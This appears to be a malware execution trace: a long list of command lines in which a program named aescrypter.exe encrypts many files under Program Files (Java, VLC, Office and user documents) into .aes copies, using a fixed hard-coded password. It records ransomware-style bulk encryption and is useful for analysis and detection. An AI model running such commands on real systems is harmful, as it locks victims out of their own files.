"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jmx.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvmstat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-threaddump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-tools.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-remote.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jmx.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvmstat.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiling.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sa.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\bin\server\Xusage.txt.aes" "C:\Program Files\Java\jre7\bin\server\Xusage.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip.aes" "C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\lib\jvm.hprof.txt.aes" "C:\Program Files\Java\jre7\lib\jvm.hprof.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\README.txt.aes" "C:\Program Files\Java\jre7\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\LimitPush.docx.aes" "C:\Program Files\LimitPush.docx" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt.aes" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt.aes" "C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File B.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt.aes" "C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\ResetReceive.png.aes" "C:\Program Files\ResetReceive.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\UpdateOut.xml.aes" "C:\Program Files\UpdateOut.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\AUTHORS.txt.aes" "C:\Program Files\VideoLAN\VLC\AUTHORS.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\COPYING.txt.aes" "C:\Program Files\VideoLAN\VLC\COPYING.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.aes" "C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
